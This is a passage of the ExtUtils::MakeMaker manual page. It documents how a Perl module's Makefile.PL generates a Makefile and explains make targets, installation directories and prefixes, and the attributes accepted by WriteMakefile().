NAME => "Foo::Bar",
VERSION_FROM => "lib/Foo/Bar.pm",
);
This utility is designed to write a Makefile for an extension module from a Makefile.PL. It is based on the Makefile.SH model provided by Andy Dougherty and the perl5-porters.
It splits the task of generating the Makefile into several subroutines that can be individually overridden. Each subroutine returns the text it wishes to have written to the Makefile.
As there are various Make programs with incompatible syntax, which use operating system shells, again with incompatible syntax, it is important for users of this module to know which flavour of Make a Makefile has been written for so they'll use the correct one and won't have to face the possibly bewildering errors resulting from using the wrong one.
On POSIX systems, that program will likely be GNU Make; on Microsoft Windows, it will be either Microsoft NMake or DMake. Note that this module does not support generating Makefiles for GNU Make on Windows. See the section on the "MAKE" parameter for details.
MakeMaker is object oriented. Each directory below the current directory that contains a Makefile.PL is treated as a separate object. This makes it possible to write an unlimited number of Makefiles with a single invocation of WriteMakefile().
The long answer is the rest of the manpage :-)
The generated Makefile enables the user of the extension to invoke
perl Makefile.PL # optionally "perl Makefile.PL verbose"
make
make test # optionally set TEST_VERBOSE=1
make install # See below
The Makefile to be produced may be altered by adding arguments of the form KEY=VALUE. E.g.
perl Makefile.PL INSTALL_BASE=~
Other interesting targets in the generated Makefile are
make config # to check if the Makefile is up-to-date
make clean # delete local temp files (Makefile gets renamed)
make realclean # delete derived files (including ./blib)
make ci # check in all the files in the MANIFEST file
make dist # see below the Distribution Support section
MakeMaker checks for the existence of a file named test.pl in the current directory, and if it exists it executes the script with the proper set of perl -I options.
MakeMaker also checks for any files matching glob("t/*.t"). It will execute all matching files in alphabetical order via the Test::Harness module with the -I switches set correctly.
If you'd like to see the raw output of your tests, set the TEST_VERBOSE variable to true.
make test TEST_VERBOSE=1
If you want to run particular test files, set the TEST_FILES variable. It is possible to use globbing with this mechanism.
make test TEST_FILES='t/foobar.t t/dagobah*.t'
A useful variation of the above is the target testdb. It runs the test under the Perl debugger (see perldebug). If the file test.pl exists in the current directory, it is used for the test.
If you want to debug some other testfile, set the TEST_FILE variable thusly:
make testdb TEST_FILE=t/mytest.t
By default the debugger is called using -d option to perl. If you want to specify some other option, set the TESTDB_SW variable:
make testdb TESTDB_SW=-Dx
make alone puts all relevant files into directories that are named by the macros INST_LIB, INST_ARCHLIB, INST_SCRIPT, INST_MAN1DIR and INST_MAN3DIR. All these default to something below ./blib if you are not building below the perl source directory. If you are building below the perl source, INST_LIB and INST_ARCHLIB default to ../../lib, and INST_SCRIPT is not defined.
The install target of the generated Makefile copies the files found below each of the INST_* directories to their INSTALL* counterparts. Which counterparts are chosen depends on the setting of INSTALLDIRS according to the following table:
INSTALLDIRS set to perl site vendor PERLPREFIX SITEPREFIX VENDORPREFIXINST_ARCHLIB INSTALLARCHLIB INSTALLSITEARCH INSTALLVENDORARCHINST_LIB INSTALLPRIVLIB INSTALLSITELIB INSTALLVENDORLIBINST_BIN INSTALLBIN INSTALLSITEBIN INSTALLVENDORBININST_SCRIPT INSTALLSCRIPT INSTALLSITESCRIPT INSTALLVENDORSCRIPTINST_MAN1DIR INSTALLMAN1DIR INSTALLSITEMAN1DIR INSTALLVENDORMAN1DIRINST_MAN3DIR INSTALLMAN3DIR INSTALLSITEMAN3DIR INSTALLVENDORMAN3DIR
The INSTALL... macros in turn default to their %Config ($Config{installprivlib}, $Config{installarchlib}, etc.) counterparts.
You can check the values of these variables on your system with
perl '-V:install.*'
And to check the sequence in which the library directories are searched by perl, run
perl -le 'print join $/, @INC'
Sometimes older versions of the module you're installing live in other directories in @INC. Because Perl loads the first version of a module it finds, not the newest, you might accidentally get one of these older versions even after installing a brand new version. To delete all other versions of the module you're installing (not simply older ones) set the UNINST variable.
make install UNINST=1
INSTALL_BASE can be passed into Makefile.PL to change where your module will be installed. INSTALL_BASE is more like what everyone else calls "prefix" than PREFIX is.
To have everything installed in your home directory, do the following.
# Unix users, INSTALL_BASE=~ works fine
perl Makefile.PL INSTALL_BASE=/path/to/your/home/dir
Like PREFIX, it sets several INSTALL* attributes at once. Unlike PREFIX it is easy to predict where the module will end up. The installation pattern looks like this:
INSTALLARCHLIB INSTALL_BASE/lib/perl5/$Config{archname}
INSTALLPRIVLIB INSTALL_BASE/lib/perl5
INSTALLBIN INSTALL_BASE/bin
INSTALLSCRIPT INSTALL_BASE/bin
INSTALLMAN1DIR INSTALL_BASE/man/man1
INSTALLMAN3DIR INSTALL_BASE/man/man3
INSTALL_BASE in MakeMaker and --install_base in Module::Build (as of 0.28) install to the same location. If you want MakeMaker and Module::Build to install to the same location simply set INSTALL_BASE and --install_base to the same location.
INSTALL_BASE was added in 6.31.
PREFIX and LIB can be used to set several INSTALL* attributes in one go. Here's an example for installing into your home directory.
# Unix users, PREFIX=~ works fine
perl Makefile.PL PREFIX=/path/to/your/home/dir
This will install all files in the module under your home directory, with man pages and libraries going into an appropriate place (usually ~/man and ~/lib). How the exact location is determined is complicated and depends on how your Perl was configured. INSTALL_BASE works more like what other build systems call "prefix" than PREFIX and we recommend you use that instead.
Another way to specify many INSTALL directories with a single parameter is LIB.
perl Makefile.PL LIB=~/lib
This will install the module's architecture-independent files into ~/lib, the architecture-dependent files into ~/lib/$archname.
Note, that in both cases the tilde expansion is done by MakeMaker, not by perl by default, nor by make.
Conflicts between parameters LIB, PREFIX and the various INSTALL* arguments are resolved so that:
setting LIB overrides any setting of INSTALLPRIVLIB, INSTALLARCHLIB, INSTALLSITELIB, INSTALLSITEARCH (and they are not affected by PREFIX);
without LIB, setting PREFIX replaces the initial $Config{prefix} part of those INSTALL* arguments, even if the latter are explicitly set (but are set to still start with $Config{prefix}).
If the user has superuser privileges, and is not working on AFS or relatives, then the defaults for INSTALLPRIVLIB, INSTALLARCHLIB, INSTALLSCRIPT, etc. will be appropriate, and this incantation will be the best:
perl Makefile.PL;
make;
make test
make install
make install by default writes some documentation of what has been done into the file $(INSTALLARCHLIB)/perllocal.pod. This feature can be bypassed by calling make pure_install.
will have to specify the installation directories as these most probably have changed since perl itself has been installed. They will have to do this by calling
perl Makefile.PL INSTALLSITELIB=/afs/here/today \
INSTALLSCRIPT=/afs/there/now INSTALLMAN3DIR=/afs/for/manpages
make
Be careful to repeat this procedure every time you recompile an extension, unless you are sure the AFS installation directories are still valid.
An extension that is built with the above steps is ready to use on systems supporting dynamic loading. On systems that do not support dynamic loading, any newly created extension has to be linked together with the available resources. MakeMaker supports the linking process by creating appropriate targets in the Makefile whenever an extension is built. You can invoke the corresponding section of the makefile with
make perl
That produces a new perl binary in the current directory with all extensions linked in that can be found in INST_ARCHLIB, SITELIBEXP, and PERL_ARCHLIB. To do that, MakeMaker writes a new Makefile, on UNIX, this is called Makefile.aperl (may be system dependent). If you want to force the creation of a new perl, it is recommended that you delete this Makefile.aperl, so the directories are searched through for linkable libraries again.
The binary can be installed into the directory where perl normally resides on your machine with
make inst_perl
To produce a perl binary with a different name than perl, either say
perl Makefile.PL MAP_TARGET=myperl
make myperl
make inst_perl
or say
perl Makefile.PL
make myperl MAP_TARGET=myperl
make inst_perl MAP_TARGET=myperl
In any case you will be prompted with the correct invocation of the inst_perl target that installs the new binary into INSTALLBIN.
make inst_perl by default writes some documentation of what has been done into the file $(INSTALLARCHLIB)/perllocal.pod. This can be bypassed by calling make pure_inst_perl.
Warning: the inst_perl: target will most probably overwrite your existing perl binary. Use with care!
Sometimes you might want to build a statically linked perl although your system supports dynamic loading. In this case you may explicitly set the linktype with the invocation of the Makefile.PL or make:
perl Makefile.PL LINKTYPE=static # recommended
or
make LINKTYPE=static # works on most systems
MakeMaker needs to know, or to guess, where certain things are located. Especially INST_LIB and INST_ARCHLIB (where to put the files during the make(1) run), PERL_LIB and PERL_ARCHLIB (where to read existing modules from), and PERL_INC (header files and libperl*.*).
Extensions may be built either using the contents of the perl source directory tree or from the installed perl library. The recommended way is to build extensions after you have run 'make install' on perl itself. You can do that in any directory on your hard disk that is not below the perl source tree. The support for extensions below the ext directory of the perl distribution is only good for the standard extensions that come with perl.
If an extension is being built below the ext/ directory of the perl source then MakeMaker will set PERL_SRC automatically (e.g., ../..). If PERL_SRC is defined and the extension is recognized as a standard extension, then other variables default to the following:
PERL_INC = PERL_SRC
PERL_LIB = PERL_SRC/lib
PERL_ARCHLIB = PERL_SRC/lib
INST_LIB = PERL_LIB
INST_ARCHLIB = PERL_ARCHLIB
If an extension is being built away from the perl source then MakeMaker will leave PERL_SRC undefined and default to using the installed copy of the perl library. The other variables default to the following:
PERL_INC = $archlibexp/CORE
PERL_LIB = $privlibexp
PERL_ARCHLIB = $archlibexp
INST_LIB = ./blib/lib
INST_ARCHLIB = ./blib/arch
If perl has not yet been installed then PERL_SRC can be defined on the command line as shown in the previous section.
If you don't want to keep the defaults for the INSTALL* macros, MakeMaker helps you to minimize the typing needed: the usual relationship between INSTALLPRIVLIB and INSTALLARCHLIB is determined by Configure at perl compilation time. MakeMaker supports the user who sets INSTALLPRIVLIB. If INSTALLPRIVLIB is set, but INSTALLARCHLIB not, then MakeMaker defaults the latter to be the same subdirectory of INSTALLPRIVLIB as Configure decided for the counterparts in %Config, otherwise it defaults to INSTALLPRIVLIB. The same relationship holds for INSTALLSITELIB and INSTALLSITEARCH.
MakeMaker gives you much more freedom than needed to configure internal variables and get different results. It is worth mentioning that make(1) also lets you configure most of the variables that are used in the Makefile. But in the majority of situations this will not be necessary, and should only be done if the author of a package recommends it (or you know what you're doing).
The following attributes may be specified as arguments to WriteMakefile() or as NAME=VALUE pairs on the command line. Attributes that became available with later versions of MakeMaker are indicated.
In order to maintain portability of attributes with older versions of MakeMaker you may want to use App::EUMM::Upgrade with your Makefile.PL.
One line description of the module. Will be included in PPD file.
Name of the file that contains the package description. MakeMaker looks for a line in the POD matching /^($package\s-\s)(.*)/. This is typically the first line in the "=head1 NAME" section. $2 becomes the abstract.
Array of strings containing name (and email address) of package author(s). Is used in CPAN Meta files (META.yml or META.json) and PPD (Perl Package Description) files for PPM (Perl Package Manager).
Used when creating PPD files for binary packages. It can be set to a full or relative path or URL to the binary archive for a particular architecture. For example:
perl Makefile.PL BINARY_LOCATION=x86/Agent.tar.gz
builds a PPD package that references a binary of the Agent package, located in the x86 directory relative to the PPD itself.
Available in version 6.5503 and above.
A hash of modules that are needed to build your module but not run it.
This will go into the build_requires field of your META.yml and the build of the prereqs field of your META.json.
Defaults to { "ExtUtils::MakeMaker" => 0 } if this attribute is not specified.
The format is the same as PREREQ_PM.
Ref to array of *.c file names. Initialised from a directory scan and the values portion of the XS attribute hash. This is not currently used by MakeMaker but may be handy in Makefile.PLs.
String that will be included in the compiler call command line between the arguments INC and OPTIMIZE.
Arrayref. E.g. [qw(archname manext)] defines ARCHNAME & MANEXT from config.sh. MakeMaker will add to CONFIG the following values anyway: ar cc cccdlflags ccdlflags dlext dlsrc ld lddlflags ldflags libc lib_ext obj_ext ranlib sitelibexp sitearchexp so
CODE reference. The subroutine should return a hash reference. The hash may contain further attributes, e.g. {LIBS => ...}, that have to be determined by some evaluation method.
Available in version 6.52 and above.
A hash of modules that are required to run Makefile.PL itself, but not to run your distribution.
This will go into the configure_requires field of your META.yml and the configure of the prereqs field of your META.json.
Defaults to { "ExtUtils::MakeMaker" => 0 } if this attribute is not specified.
The format is the same as PREREQ_PM.
Something like "-DHAVE_UNISTD_H"
This is the root directory into which the code will be installed. It prepends itself to the normal prefix. For example, if your code would normally go into /usr/local/lib/perl you could set DESTDIR=~/tmp/ and installation would go into ~/tmp/usr/local/lib/perl.
This is primarily of use for people who repackage Perl modules.
NOTE: Due to the nature of make, it is important that you put the trailing slash on your DESTDIR. ~/tmp/ not ~/tmp.
Ref to array of subdirectories containing Makefile.PLs e.g. ['sdbm'] in ext/SDBM_File
A safe filename for the package.
Defaults to NAME below but with :: replaced with -.
For example, Foo::Bar becomes Foo-Bar.
Your name for distributing the package with the version number included. This is used by 'make dist' to name the resulting archive file.
Defaults to DISTNAME-VERSION.
For example, version 1.04 of Foo::Bar becomes Foo-Bar-1.04.
On some OS's where . has special meaning VERSION_SYM may be used in place of VERSION.
Specifies the extension of the module's loadable object. For example:
DLEXT => 'unusual_ext', # Default value is $Config{so}
NOTE: When using this option to alter the extension of a module's loadable object, it is also necessary that the module's pm file specifies the same change:
local $DynaLoader::dl_dlext = 'unusual_ext';
Hashref of symbol names for routines to be made available as universal symbols. Each key/value pair consists of the package name and an array of routine names in that package. Used only under AIX, OS/2, VMS and Win32 at present. The routine names supplied will be expanded in the same way as XSUB names are expanded by the XS() macro. Defaults to
{"$(NAME)" => ["boot_$(NAME)" ] }
e.g.
{"RPC" => [qw( boot_rpcb rpcb_gettime getnetconfigent )],
"NetconfigPtr" => [ 'DESTROY'] }
Please see the ExtUtils::Mksymlists documentation for more information about the DL_FUNCS, DL_VARS and FUNCLIST attributes.
Array of symbol names for variables to be made available as universal symbols. Used only under AIX, OS/2, VMS and Win32 at present. Defaults to []. (e.g. [ qw(Foo_version Foo_numstreams Foo_tree ) ])
Array of extension names to exclude when doing a static build. This is ignored if INCLUDE_EXT is present. Consult INCLUDE_EXT for more details. (e.g. [ qw( Socket POSIX ) ] )
This attribute may be most useful when specified as a string on the command line: perl Makefile.PL EXCLUDE_EXT='Socket Safe'
Ref to array of executable files. The files will be copied to the INST_SCRIPT directory. Make realclean will delete them from there again.
If your executables start with something like #!perl or #!/usr/bin/perl MakeMaker will change this to the path of the perl 'Makefile.PL' was invoked with so the programs will be sure to run properly even if perl is not in /usr/bin/perl.
The name of the Makefile to be produced. This is used for the second Makefile that will be produced for the MAP_TARGET.
Defaults to 'Makefile' or 'Descrip.MMS' on VMS.
(Note: we couldn't use MAKEFILE because dmake uses this for something else).
Perl binary able to run this extension, load XS modules, etc...
Like PERLRUN, except it uses FULLPERL.
Like PERLRUNINST, except it uses FULLPERL.
This provides an alternate means to specify function names to be exported from the extension. Its value is a reference to an array of function names to be exported by the extension. These names are passed through unaltered to the linker options file.
Ref to array of *.h file names. Similar to C.
This attribute is used to specify names to be imported into the extension. Takes a hash ref.
It is only used on OS/2 and Win32.
Include file dirs eg: "-I/usr/5include -I/path/to/inc"
Array of extension names to be included when doing a static build. MakeMaker will normally build with all of the installed extensions when doing a static build, and that is usually the desired behavior. If INCLUDE_EXT is present then MakeMaker will build only with those extensions which are explicitly mentioned. (e.g. [ qw( Socket POSIX ) ])
It is not necessary to mention DynaLoader or the current extension when filling in INCLUDE_EXT. If the INCLUDE_EXT is mentioned but is empty then only DynaLoader and the current extension will be included in the build.
This attribute may be most useful when specified as a string on the command line: perl Makefile.PL INCLUDE_EXT='POSIX Socket Devel::Peek'
Used by 'make install', which copies files from INST_ARCHLIB to this directory if INSTALLDIRS is set to perl.
Directory to install binary files (e.g. tkperl) into if INSTALLDIRS=perl.
Determines which of the sets of installation directories to choose: perl, site or vendor. Defaults to site.
These directories get the man pages at 'make install' time if INSTALLDIRS=perl. Defaults to $Config{installman*dir}.
If set to 'none', no man pages will be installed.
Used by 'make install', which copies files from INST_LIB to this directory if INSTALLDIRS is set to perl.
Defaults to $Config{installprivlib}.
Used by 'make install' which copies files from INST_SCRIPT to this directory if INSTALLDIRS=perl.
Used by 'make install', which copies files from INST_ARCHLIB to this directory if INSTALLDIRS is set to site (default).
Used by 'make install', which copies files from INST_BIN to this directory if INSTALLDIRS is set to site (default).
Used by 'make install', which copies files from INST_LIB to this directory if INSTALLDIRS is set to site (default).
These directories get the man pages at 'make install' time if INSTALLDIRS=site (default). Defaults to $(SITEPREFIX)/man/man$(MAN*EXT).
If set to 'none', no man pages will be installed.
Used by 'make install' which copies files from INST_SCRIPT to this directory if INSTALLDIRS is set to site (default).
Used by 'make install', which copies files from INST_ARCHLIB to this directory if INSTALLDIRS is set to vendor.
Used by 'make install', which copies files from INST_BIN to this directory if INSTALLDIRS is set to vendor.
Used by 'make install', which copies files from INST_LIB to this directory if INSTALLDIRS is set to vendor.
These directories get the man pages at 'make install' time if INSTALLDIRS=vendor. Defaults to $(VENDORPREFIX)/man/man$(MAN*EXT).
If set to 'none', no man pages will be installed.
Used by 'make install' which copies files from INST_SCRIPT to this directory if INSTALLDIRS is set to vendor.
Same as INST_LIB for architecture dependent files.
Directory to put real binary files during 'make'. These will be copied to INSTALLBIN during 'make install'
Directory where we put library files of this extension while building it.
Directory to hold the man pages at 'make' time
Directory to hold the man pages at 'make' time
Directory where executable files should be installed during 'make'. Defaults to "./blib/script", just to have a dummy location during testing. make install will copy the files in INST_SCRIPT to INSTALLSCRIPT.
Program to be used to link libraries for dynamic loading.
Defaults to $Config{ld}.
Any special flags that might need to be passed to ld to create a shared library suitable for dynamic loading. It is up to the makefile to use it. (See "lddlflags" in Config)
Defaults to $Config{lddlflags}.
Defaults to "$(OBJECT)" and is used in the ld command to specify what files to link/load from (also see dynamic_lib below for how to specify ld flags)
LIB should only be set at perl Makefile.PL time but is allowed as a MakeMaker argument. It has the effect of setting both INSTALLPRIVLIB and INSTALLSITELIB to that value regardless any explicit setting of those arguments (or of PREFIX). INSTALLARCHLIB and INSTALLSITEARCH are set to the corresponding architecture subdirectory.
The filename of the perllibrary that will be used together with this extension. Defaults to libperl.a.
An anonymous array of alternative library specifications to be searched for (in order) until at least one library is found. E.g.
'LIBS' => ["-lgdbm", "-ldbm -lfoo", "-L/path -ldbm.nfs"]
Mind, that any element of the array contains a complete set of arguments for the ld command. So do not specify
'LIBS' => ["-ltcl", "-ltk", "-lX11"]
See ODBM_File/Makefile.PL for an example, where an array is needed. If you specify a scalar as in
'LIBS' => "-ltcl -ltk -lX11"
MakeMaker will turn it into an array with one element.
Available in version 6.31 and above.
The licensing terms of your distribution. Generally it's "perl_5" for the same license as Perl itself.
See CPAN::Meta::Spec for the list of options.
Defaults to "unknown".
'static' or 'dynamic' (default unless usedl=undef in config.sh). Should only be used to force static linking (also see linkext below).
When this is set to 1, OBJECT will be automagically derived from XS.
Variant of make you intend to run the generated Makefile with. This parameter lets Makefile.PL know what make quirks to account for when generating the Makefile.
MakeMaker also honors the MAKE environment variable. This parameter takes precedence.
Currently the only significant values are 'dmake' and 'nmake' for Windows users, instructing MakeMaker to generate a Makefile in the flavour of DMake ("Dennis Vadura's Make") or Microsoft NMake respectively.
Defaults to $Config{make}, which may go looking for a Make program in your environment.
How are you supposed to know what flavour of Make a Makefile has been generated for if you didn't specify a value explicitly? Search the generated Makefile for the definition of the MAKE variable, which is used to recursively invoke the Make utility. That will tell you what Make you're supposed to invoke the Makefile with.
Boolean which tells MakeMaker that it should include the rules to make a perl. This is handled automatically as a switch by MakeMaker. The user normally does not need it.
When 'make clean' or similar is run, the $(FIRST_MAKEFILE) will be backed up at this location.
Defaults to $(FIRST_MAKEFILE).old or $(FIRST_MAKEFILE)_old on VMS.
Hashref of pod-containing files. MakeMaker will default this to all EXE_FILES files that include POD directives. The files listed here will be converted to man pages and installed as was requested at Configure time.
This hash should map POD files (or scripts containing POD) to the man file names under the blib/man1/ directory, as in the following example:
MAN1PODS => {
'doc/command.pod' => 'blib/man1/command.1',
'scripts/script.pl' => 'blib/man1/script.1',
}
Hashref that assigns to *.pm and *.pod files the files into which the manpages are to be written. MakeMaker parses all *.pod and *.pm files for POD directives. Files that contain POD will be the default keys of the MAN3PODS hashref. These will then be converted to man pages during make and will be installed during make install.
Example similar to MAN1PODS.
If it is intended that a new perl binary be produced, this variable may hold a name for that binary. Defaults to perl
Available in version 6.46 and above.
A hashref of items to add to the CPAN Meta file (META.yml or META.json).
They differ in how they behave if they have the same key as the default metadata. META_ADD will override the default value with its own. META_MERGE will merge its value with the default.
Unless you want to override the defaults, prefer META_MERGE so as to get the advantage of any future defaults.
By default CPAN Meta specification 1.4 is used. In order to use CPAN Meta specification 2.0, indicate with meta-spec the version you want to use.
META_MERGE => {
"meta-spec" => { version => 2 },
resources => {
repository => {
type => 'git',
url => 'git://github.com/Perl-Toolchain-Gang/ExtUtils-MakeMaker.git',
web => 'https://github.com/Perl-Toolchain-Gang/ExtUtils-MakeMaker',
},
},
},
Available in version 6.48 and above.
The minimum required version of Perl for this distribution.
Either the 5.006001 or the 5.6.1 format is acceptable.
If the extension links to a library that it builds, set this to the name of the library (see SDBM_File)
The package representing the distribution. For example, Test::More or ExtUtils::MakeMaker. It will be used to derive information about the distribution such as the DISTNAME, installation locations within the Perl library and where XS files will be looked for by default (see XS).
NAME must be a valid Perl package name and it must have an associated .pm file. For example, Foo::Bar is a valid NAME and there must exist Foo/Bar.pm. Any XS code should be in Bar.xs unless stated otherwise.
Your distribution must have a NAME.
MakeMaker will figure out if an extension contains linkable code anywhere down the directory tree, and will set this variable accordingly, but you can speed it up a very little bit if you define this boolean variable yourself.
Command so make does not print the literal commands it's running.
By setting it to an empty string you can generate a Makefile that prints all commands. Mainly used in debugging MakeMaker itself.
Defaults to @.
Boolean. Attribute to inhibit descending into subdirectories.
When true, suppresses the generation and addition to the MANIFEST of the META.yml and META.json module meta-data files during 'make distdir'.
Defaults to false.
When true, suppresses the generation of MYMETA.yml and MYMETA.json module meta-data files during 'perl Makefile.PL'.
Defaults to false.
When true, suppresses the writing of packlist files for installs.
Defaults to false.
When true, suppresses the appending of installations to perllocal.
Defaults to false.
In general, any generated Makefile checks for the current version of MakeMaker and the version the Makefile was built under. If NO_VC is set, the version check is neglected. Do not write this into your Makefile.PL, use it interactively instead.
List of object files, defaults to '$(BASEEXT)$(OBJ_EXT)', but can be a long string or an array containing all object files, e.g. "tkpBind.o tkpButton.o tkpCanvas.o" or ["tkpBind.o", "tkpButton.o", "tkpCanvas.o"]
(Where BASEEXT is the last component of NAME, and OBJ_EXT is $Config{obj_ext}.)
Defaults to -O. Set it to -g to turn debugging on. The flag is passed to subdirectory makes.
Perl binary for tasks that can be done by miniperl.
Set only when MakeMaker is building the extensions of the Perl core distribution.
The call to the program that is able to compile perlmain.c. Defaults to $(CC).
Same as for PERL_LIB, but for architecture dependent files.
Used only when MakeMaker is building the extensions of the Perl core distribution (because normally $(PERL_ARCHLIB) is automatically in @INC, and adding it would get in the way of PERL5LIB).
Directory containing the Perl library to use.
Used only when MakeMaker is building the extensions of the Perl core distribution (because normally $(PERL_LIB) is automatically in @INC, and adding it would get in the way of PERL5LIB).
defaults to 0. Should be set to TRUE if the extension can work with the memory allocation routines substituted by the Perl malloc() subsystem. This should be applicable to most extensions with exceptions of those
with bugs in memory allocations which are caught by Perl's malloc();
which interact with the memory allocator in other ways than via malloc(), realloc(), free(), calloc(), sbrk() and brk();
which rely on special alignment which is not provided by Perl's malloc().
NOTE. Neglecting to set this flag in any one of the loaded extension nullifies many advantages of Perl's malloc(), such as better usage of system resources, error detection, memory usage reporting, catchable failure of memory allocations, etc.
Directory under which core modules are to be installed.
Defaults to $Config{installprefixexp}, falling back to $Config{installprefix}, $Config{prefixexp} or $Config{prefix} should $Config{installprefixexp} not exist.
Overridden by PREFIX.
Use this instead of $(PERL) when you wish to run perl. It will set up extra necessary flags for you.
Use this instead of $(PERL) when you wish to run perl to work with modules. It will add things like -I$(INST_ARCH) and other necessary flags so perl can see the modules you're about to install.
Directory containing the Perl source code (use of this should be avoided, it may be undefined)
Desired permission for directories. Defaults to 755.
Desired permission for read/writable files. Defaults to 644.
Desired permission for executable files. Defaults to 755.
MakeMaker can run programs to generate files for you at build time. By default any file named *.PL (except Makefile.PL and Build.PL) in the top level directory will be assumed to be a Perl program and run passing its own basename in as an argument. For example...
perl foo.PL foo
This behavior can be overridden by supplying your own set of files to search. PL_FILES accepts a hash ref, the key being the file to run and the value is passed in as the first argument when the PL file is run.
PL_FILES => {'bin/foobar.PL' => 'bin/foobar'}
Would run bin/foobar.PL like this:
perl bin/foobar.PL bin/foobar
If multiple files from one program are desired an array ref can be used.
PL_FILES => {'bin/foobar.PL' => [qw(bin/foobar1 bin/foobar2)]}
In this case the program will be run multiple times using each target file.
perl bin/foobar.PL bin/foobar1
perl bin/foobar.PL bin/foobar2
PL files are normally run after pm_to_blib and include INST_LIB and INST_ARCH in their @INC, so the just built modules can be accessed... unless the PL file is making a module (or anything else in PM) in which case it is run before pm_to_blib and does not include INST_LIB and INST_ARCH in its @INC. This apparently odd behavior is there for backwards compatibility (and it's somewhat DWIM).
Hashref of .pm files and *.pl files to be installed. e.g.
{'name_of_file.pm' => '$(INST_LIB)/install_as.pm'}
By default this will include *.pm and *.pl and the files found in the PMLIBDIRS directories. Defining PM in the Makefile.PL will override PMLIBDIRS.
Ref to array of subdirectories containing library files. Defaults to [ 'lib', $(BASEEXT) ]. The directories will be scanned and any files they contain will be installed in the corresponding location in the library. A libscan() method can be used to alter the behaviour. Defining PM in the Makefile.PL will override PMLIBDIRS.
(Where BASEEXT is the last component of NAME.)
A filter program, in the traditional Unix sense (input from stdin, output to stdout) that is passed on each .pm file during the build (in the pm_to_blib() phase). It is empty by default, meaning no filtering is done.
Great care is necessary when defining the command if quoting needs to be done. For instance, you would need to say:
{'PM_FILTER' => 'grep -v \\"^\\#\\"'}
to remove all the leading comments on the fly during the build. The extra \\ are necessary, unfortunately, because this variable is interpolated within the context of a Perl program built on the command line, and double quotes are what is used with the -e switch to build that command line. The # is escaped for the Makefile, since what is going to be generated will then be:
PM_FILTER = grep -v \"^\#\"
Without the \\ before the #, we'd have the start of a Makefile comment, and the macro would be incorrectly defined.
Release 5.005 grandfathered old global symbol names by providing preprocessor macros for extension source compatibility. As of release 5.6, these preprocessor definitions are not available by default. The POLLUTE flag specifies that the old names should still be defined:
perl Makefile.PL POLLUTE=1
Please inform the module author if this is necessary to successfully install a module under 5.6 or later.
Name of the executable used to run PPM_INSTALL_SCRIPT below. (e.g. perl)
Name of the script that gets executed by the Perl Package Manager after the installation of a package.
Name of the executable used to run PPM_UNINSTALL_SCRIPT below. (e.g. perl)
Name of the script that gets executed by the Perl Package Manager before the removal of a package.
This overrides all the default install locations. Man pages, libraries, scripts, etc... MakeMaker will try to make an educated guess about where to place things under the new PREFIX based on your Config defaults. Failing that, it will fall back to a structure which should be sensible for your platform.
If you specify LIB or any INSTALL* variables they will not be affected by the PREFIX.
Bool. If this parameter is true, failing to have the required modules (or the right versions thereof) will be fatal. perl Makefile.PL will die instead of simply informing the user of the missing dependencies.
It is extremely rare to have to use PREREQ_FATAL. Its use by module authors is strongly discouraged and should never be used lightly.
For dependencies that are required in order to run Makefile.PL, see CONFIGURE_REQUIRES.
Module installation tools have ways of resolving unmet dependencies but to do that they need a Makefile. Using PREREQ_FATAL breaks this. That's bad.
Assuming you have good test coverage, your tests should fail with missing dependencies informing the user more strongly that something is wrong. You can write a t/00compile.t test which will simply check that your code compiles and stop "make test" prematurely if it doesn't. See "BAIL_OUT" in Test::More for more details.
A hash of modules that are needed to run your module. The keys are the module names ie. Test::More, and the minimum version is the value. If the required version number is 0 any version will do.
This will go into the requires field of your META.yml and the runtime of the prereqs field of your META.json.
PREREQ_PM => {
# Require Test::More at least 0.47
"Test::More" => "0.47",
# Require any version of Acme::Buffy
"Acme::Buffy" => 0,
}
Bool. If this parameter is true, the prerequisites will be printed to stdout and MakeMaker will exit. The output format is an evalable hash ref.
$PREREQ_PM = {
'A::B' => Vers1,
'C::D' => Vers2,
...
};
If a distribution defines a minimal required perl version, this is added to the output as an additional line of the form:
$MIN_PERL_VERSION = '5.008001';
If BUILD_REQUIRES is not empty, it will be dumped as $BUILD_REQUIRES hashref.
RedHatism for PREREQ_PRINT. The output format is different, though:
perl(A::B)>=Vers1 perl(C::D)>=Vers2 ...
A minimal required perl version, if present, will look like this:
perl(perl)>=5.008001
Like PERLPREFIX, but only for the site install locations.
Defaults to $Config{siteprefixexp}. Perls prior to 5.6.0 didn't have an explicit siteprefix in the Config. In those cases $Config{installprefix} will be used.
Overridable by PREFIX
When true, perform the generation and addition to the MANIFEST of the SIGNATURE file in the distdir during 'make distdir', via 'cpansign -s'.
Note that you need to install the Module::Signature module to perform this operation.
Defaults to false.
Arrayref. E.g. [qw(name1 name2)] skip (do not write) sections of the Makefile. Caution! Do not use the SKIP attribute for the negligible speedup. It may seriously damage the resulting Makefile. Only use it if you really need it.
Available in version 6.64 and above.
A hash of modules that are needed to test your module but not run or build it.
This will go into the build_requires field of your META.yml and the test of the prereqs field of your META.json.
The format is the same as PREREQ_PM.
Ref to array of typemap file names. Use this when the typemaps are in some directory other than the current directory or when they are not named typemap. The last typemap in the list takes precedence. A typemap in the current directory has highest precedence, even if it isn't listed in TYPEMAPS. The default system typemap has lowest precedence.
Like PERLPREFIX, but only for the vendor install locations.
Defaults to $Config{vendorprefixexp}.
Overridable by PREFIX
If true, make install will be verbose
Your version number for distributing the package. This defaults to 0.1.
Instead of specifying the VERSION in the Makefile.PL you can let MakeMaker parse a file to determine the version number. The parsing routine requires that the file named by VERSION_FROM contains one single line to compute the version number. The first line in the file that contains something like a $VERSION assignment or package Name VERSION will be used. The following lines will be parsed o.k.:
# Good
package Foo::Bar 1.23; # 1.23
$VERSION = '1.00'; # 1.00
*VERSION = \'1.01'; # 1.01
($VERSION) = q$Revision$ =~ /(\d+)/g; # The digits in $Revision$
$FOO::VERSION = '1.10'; # 1.10
*FOO::VERSION = \'1.11'; # 1.11
but these will fail:
# Bad
my $VERSION = '1.01';
local $VERSION = '1.02';
local $FOO::VERSION = '1.30';
(Putting my or local on the preceding line will work o.k.)
"Version strings" are incompatible and should not be used.
# Bad
$VERSION = 1.2.3;
$VERSION = v1.2.3;
version objects are fine. As of MakeMaker 6.35 version.pm will be automatically loaded, but you must declare the dependency on version.pm. For compatibility with older MakeMaker you should load on the same line as $VERSION is declared.
# All on one line
use version; our $VERSION = qv(1.2.3);
The file named in VERSION_FROM is not added as a dependency to Makefile. This is not really correct, but it would be a major pain during development to have to rewrite the Makefile for any smallish change in that file. If you want to make sure that the Makefile contains the correct VERSION macro after any change of the file, you would have to do something like
depend => { Makefile => '$(VERSION_FROM)' }
See attribute depend below.
